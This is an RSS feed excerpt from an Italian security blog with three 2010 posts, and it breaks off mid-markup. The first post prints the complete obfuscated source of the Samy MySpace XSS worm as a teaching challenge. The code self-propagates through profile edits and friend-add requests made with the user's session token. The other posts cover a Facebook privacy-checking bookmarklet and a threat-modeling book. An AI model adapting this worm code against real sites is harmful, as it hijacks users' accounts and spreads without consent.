<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Nicola Moretti - Hanicker IT Blog &#187; Sicurezza</title>
	<atom:link href="http://blog.nicolamoretti.com/category/informatica/sicurezza/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nicolamoretti.com</link>
	<description>Tecnologia e Digital Hacks</description>
	<lastBuildDate>Thu, 12 Aug 2010 22:51:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>Myspace old XSS virus</title>
		<link>http://blog.nicolamoretti.com/2010/08/myspace-old-xss-virus/</link>
		<comments>http://blog.nicolamoretti.com/2010/08/myspace-old-xss-virus/#comments</comments>
		<pubDate>Thu, 12 Aug 2010 22:48:37 +0000</pubDate>
		<dc:creator>Nick</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[myspace]]></category>
		<category><![CDATA[worm]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.nicolamoretti.com/?p=377</guid>
		<description><![CDATA[<br/>A volte anche un vecchio worm js può risultare utile a livello didattico, anche per capire come sia difficile limitare i danni di eventuali falle XSS. La sfida è semplice, ecco il codice: &#60;div id=mycode style="BACKGROUND: url('java&#60;br /&#62; script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&#38;');var AS=new Array();for(var O=0;O&#60;F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return [...]]]></description>
			<content:encoded><![CDATA[<br/><p><a href="http://blog.nicolamoretti.com/wp-content/uploads/2010/08/samytshirt.jpg" ><img class="alignleft size-medium wp-image-378" style="margin-left: 5px; margin-right: 5px;" title="samytshirt" src="http://blog.nicolamoretti.com/wp-content/uploads/2010/08/samytshirt-300x278.jpg" alt="" width="300" height="278" /></a>A volte anche un vecchio worm js può risultare utile a livello didattico, anche per capire come sia difficile limitare i danni di eventuali falle XSS.</p>
<p>La sfida è semplice, ecco il codice:</p>
<pre class="javascript" name="code">&lt;div id=mycode style="BACKGROUND: url('java&lt;br /&gt; script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&amp;');var AS=new Array();for(var O=0;O&lt;F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O&gt;0){N+='&amp;'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&amp;')!=-1){Q=Q.replace('&amp;','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&amp;'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. &lt;d'+'iv id='+AE+'D'+'IV&gt;'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','&lt;/td&gt; &lt;p&gt;');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&amp;Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&amp;Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&amp;friendID='+AN+'&amp;Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&amp;friendID=11851658&amp;Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&amp;Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"&gt;&lt;/DIV&gt; </pre>
<p>Il codice permetteva di guadagnare velocemente amici su MySpace, tanto da meritarsi una <a rel="nofollow" href="http://en.wikipedia.org/wiki/Samy_%28XSS%29" >pagina su wikipedia</a>.</p>
<p>Se avete problemi nell&#8217;analisi, ecco il <a href="http://namb.la/popular/tech.html" >link di riferimento</a> per l&#8217;analisi. <a href="http://namb.la/popular/tech.html" >Qui</a>, invece, è disponibile la storia di questo bug.</p>
<p><a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Google Reader" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a href="http://www.addtoany.com/add_to/orkut?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Orkut" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/orkut.png" width="16" height="16" alt="Orkut"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/myspace?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="MySpace" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/myspace.png" width="16" height="16" alt="MySpace"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a> <a href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a> <a href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a> <a href="http://www.addtoany.com/add_to/netlog?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Netlog" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/netlog.png" width="16" height="16" alt="Netlog"/></a> <a href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Tumblr" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.nicolamoretti.com/2010/08/myspace-old-xss-virus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Impostazioni Privacy Facebook</title>
		<link>http://blog.nicolamoretti.com/2010/05/impostazioni-privacy-facebook/</link>
		<comments>http://blog.nicolamoretti.com/2010/05/impostazioni-privacy-facebook/#comments</comments>
		<pubDate>Tue, 18 May 2010 01:01:38 +0000</pubDate>
		<dc:creator>Nick</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[privacy]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://blog.nicolamoretti.com/?p=250</guid>
		<description><![CDATA[<br/>Una volta registrati a Facebook la privacy dei nostri dati è messa a dura prova. Il rischio maggiore è sicuramente il temuto upgrade di sistema che, di tanto in tanto, viene attuato dai tecnici dell&#8217;azienda di Palo Alto. Molto spesso questo vuol dire che le impostazioni relative alla privacy che abbiamo configurato poco tempo fa [...]]]></description>
			<content:encoded><![CDATA[<br/><p>Una volta registrati a <strong>Facebook</strong> la <strong>privacy</strong> dei nostri dati è messa a dura prova. Il rischio maggiore è sicuramente il temuto <strong>upgrade di sistema</strong> che, di tanto in tanto, viene attuato dai tecnici dell&#8217;azienda di Palo Alto. Molto spesso questo vuol dire che le impostazioni relative alla privacy che abbiamo configurato poco tempo fa non sono piu valide ed è tutto da risistemare il prima possibile.</p>
<p>Uno strumento appena nato ma molto efficace per controllare velocemente se le impostazioni del nostro profilo sono &#8220;buone&#8221; è <a href="http://www.reclaimprivacy.org/" >ReclaimPrivacy</a>.</p>
<p>Il funzionamento è molto semplice:</p>
<p><em>una volta visitato il sito </em><a href="http://www.reclaimprivacy.org/" ><em>http://www.reclaimprivacy.org/</em></a><em> è sufficiente aggiungere ai nostri segnalibri il link indicato dalla scritta </em><strong><em>Scan for Privacy</em></strong><em>.</em></p>
<p><em>A questo punto ci basterà accedere alla home page di facebook e quindi premere sul link per ricevere un report globale ed eventualmente alcuni suggerimenti efficaci su come migliorare determinate impostazioni.</em></p>
<p><a href="http://blog.nicolamoretti.com/wp-content/uploads/2010/05/img-1.jpg" ><img class="aligncenter size-full wp-image-252" title="Facebook privacy" src="http://blog.nicolamoretti.com/wp-content/uploads/2010/05/img-1.jpg" alt="" width="581" height="183" /></a></p>
<p>Avendo a disposizione anche il codice sorgente di questo script possiamo verificarne facilmente la sua affidabilità: i dati che andrà a verificare non verranno comunicati a nessuno.</p>
<p><a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Google Reader" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a href="http://www.addtoany.com/add_to/orkut?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Orkut" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/orkut.png" width="16" height="16" alt="Orkut"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/myspace?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="MySpace" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/myspace.png" width="16" height="16" alt="MySpace"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a> <a href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a> <a href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a> <a href="http://www.addtoany.com/add_to/netlog?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Netlog" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/netlog.png" width="16" height="16" alt="Netlog"/></a> <a href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Tumblr" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Fimpostazioni-privacy-facebook%2F&amp;linkname=Impostazioni%20Privacy%20Facebook" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.nicolamoretti.com/2010/05/impostazioni-privacy-facebook/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Piattaforma di simulazione attacchi e studio minacce</title>
		<link>http://blog.nicolamoretti.com/2010/02/piattaforma-di-simulazione-attacchi-e-studio-minacce/</link>
		<comments>http://blog.nicolamoretti.com/2010/02/piattaforma-di-simulazione-attacchi-e-studio-minacce/#comments</comments>
		<pubDate>Sun, 21 Feb 2010 10:44:35 +0000</pubDate>
		<dc:creator>Nick</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[botnet]]></category>
		<category><![CDATA[honeypots]]></category>
		<category><![CDATA[ids]]></category>
		<category><![CDATA[laboratorio virtuale]]></category>
		<category><![CDATA[libro]]></category>

		<guid isPermaLink="false">http://blog.nicolamoretti.com/?p=168</guid>
		<description><![CDATA[<br/>Da pochi giorni è disponibile gratuitamente sotto licenza GPL FDL v1.3 un libro scritto da Olu Akindeinde dal titolo ATTACK SIMULATION AND THREAT MODELING. Struttura Il libro si divide in quattro parti. 1. Vettori di attacco Descrive e classifica i vari metodi usati per compromettere la sicurezza di un sistema informatico ed evidenzia il ruolo [...]]]></description>
			<content:encoded><![CDATA[<br/><p>Da pochi giorni è disponibile gratuitamente sotto licenza GPL FDL v1.3 un libro scritto da <strong>Olu Akindeinde</strong> dal titolo</p>
<p><em>ATTACK SIMULATION AND THREAT MODELING</em>.</p>
<p><a href="http://blog.nicolamoretti.com/wp-content/uploads/2010/02/Screenshot-Modified-4.png" ><img class="aligncenter size-full wp-image-185" title="Screenshot (Modified (4))" src="http://blog.nicolamoretti.com/wp-content/uploads/2010/02/Screenshot-Modified-4.png" alt="" width="415" height="384" /></a></p>
<h3>Struttura</h3>
<p>Il libro si divide in quattro parti.</p>
<h4>1. Vettori di attacco</h4>
<p>Descrive e classifica i vari metodi usati per compromettere la sicurezza di un sistema informatico ed evidenzia il ruolo che errori, bug, falle e altri fattori ricoprono.</p>
<h4>2. Simulazione di attacco</h4>
<p>A sua volta diviso in:</p>
<ul>
<li>Laboratorio Virtuale</li>
<li>Identificazione degli attacchi (IDS)</li>
<li>Raccolta delle informazioni di identificazione (<a rel="nofollow" href="http://it.wikipedia.org/wiki/Honeypot" >Honeypots</a>, ecc.)</li>
</ul>
<p>Descrive la preparazione del laboratorio virtuale, implementandolo su VMware, VirtualBox e Qemu. Successivamente l&#8217;IDS e la sua configurazione. Infine la rilevazione di attacchi negli Honeypots e nelle Honeynets, parlando di usi e tipologie.</p>
<h4>3. Analisi dell&#8217;attacco</h4>
<p>A sua volta diviso in:</p>
<ul>
<li>Analisi del comportamento</li>
<li>Correlazione tra attacchi</li>
</ul>
<p>Descrive anzitutto i modi di propagazione delle minacce e i tool a disposizione per catturare questi comportamenti e mostrare i dati raccolti. Successivamente descrive le tecnologie per mostrare e filtrare eventi correlati, aggregandoli e memorizzandoli.</p>
<h4>4. Modellazione dell&#8217;attacco</h4>
<p>L&#8217;ultima parte parla di <a rel="nofollow" href="http://it.wikipedia.org/wiki/Riconoscimento_di_pattern" >riconoscimento di pattern</a>.</p>
<h3>Conclusioni</h3>
<p>Si tratta quindi di un libro molto completo e strettamente legato alla praticità e ai problemi reali che si affrontano in questo settore. Per chi volesse approfondire, lo stesso autore ha messo a disposizione sotto GPL anche un altro libro,  <em>Security Analysis and Data Visualization</em>, che potete scaricare da <a href="http://www.vizsec.org/Members/fx0ne/security-analysis-and-data-visualization-a-book/Security_Analysis_and_Data_Visualization.pdf" >qui</a> o da <a href="http://blog.nicolamoretti.com/wp-content/uploads/2010/02/Security_Analysis_and_Data_Visualization.pdf" >qui</a>.</p>
<h3>Download</h3>
<p>Potete scaricarlo dal sito ufficiale a questo indirizzo:</p>
<p><a href="http://inverse.com.ng/book2/Attack_Simulation_and_Threat_Modeling.pdf" >http://inverse.com.ng/book2/Attack_Simulation_and_Threat_Modeling.pdf</a></p>
<p>o (nel caso non fosse disponibile) da questo server <a href="http://blog.nicolamoretti.com/wp-content/uploads/2010/02/Attack_Simulation_and_Threat_Modeling.pdf" >cliccando qui</a>.</p>
<p><a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="StumbleUpon" rel="nofollow" target="_blank"><img 